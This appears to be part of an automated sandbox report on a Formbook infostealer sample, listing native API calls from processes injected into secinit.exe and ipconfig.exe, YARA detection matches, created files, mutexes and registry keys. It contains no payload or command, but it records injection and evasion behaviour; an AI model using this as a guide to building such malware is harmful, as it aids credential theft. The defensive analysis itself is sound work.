          Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038897A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889A20 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038899A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038895D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038898F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0388A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889FE0 NtCreateMutant
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889B00 NtSetValueKey
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0388A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889760 NtOpenProcess
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889770 NtSetInformationFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0388A770 NtOpenThread
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038896D0 NtCreateKey
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889A10 NtQuerySection
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889650 NtQueryValueKey
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038899D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038895F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0388AD30 NtSetContextThread
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889950 NtQueueApcThread
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889560 NtWriteFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038898A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03889820 NtEnumerateKey
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0388B040 NtSuspendThread
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10429850 NtCreateFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10429900 NtReadFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10429980 NtClose
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10429A30 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042984A NtCreateFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_104298FB NtReadFile
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042997A NtClose
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9B00 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9560 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9770 NtSetInformationFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BCB040 NtSuspendThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9A20 NtResumeThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9A10 NtQuerySection
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BCA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BCAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9660 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9650 NtQueryValueKey
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BCA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BCA770 NtOpenThread
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BC9760 NtOpenProcess
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00169850 NtCreateFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00169900 NtReadFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00169980 NtClose
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016984A NtCreateFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_001698FB NtReadFile
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016997A NtClose
Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe | Code function: 21_2_00F1146F RtlInitUnicodeString,NtOpenEvent,NtCreateEvent,NtOpenEvent,WaitForSingleObject,NtClose,NetJoinDomain
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0387EBB0
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03866E30
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0385D5E0
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0384F900
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03840D20
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03911D55
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0385B090
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_03901002
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_0385841F
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10411030
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042CA46
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042DA5E
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042D29D
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042CB3E
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042D4B3
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10412D90
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042DFE6
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_1042D7F9
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10419F80
Source: C:\Windows\SysWOW64\secinit.exe | Code function: 2_2_10412FB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00B9B090
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C528EC
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C520A8
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C41002
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00B8F900
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C522AE
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BBEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C4DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C52B28
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C4D466
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00B9841F
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C525DD
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00B9D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C51D55
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00B80D20
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C52D07
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C52EF7
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00BA6E30
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C4D616
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00C51FF1
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016DA5E
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016CA46
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016D4B3
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00152D90
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00159F80
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_00152FB0
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016D7F9
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 10_2_0016DFE6
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 00B8B150 appears 35 times
Source: C:\Windows\SysWOW64\secinit.exe | Code function: String function: 0384B150 appears 32 times
Source: f97e137e_by_Libranalysis.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/9@6/2
Source: C:\Windows\explorer.exe | File created: C:\Program Files (x86)\Adrldefcp
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Adrldefcp
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini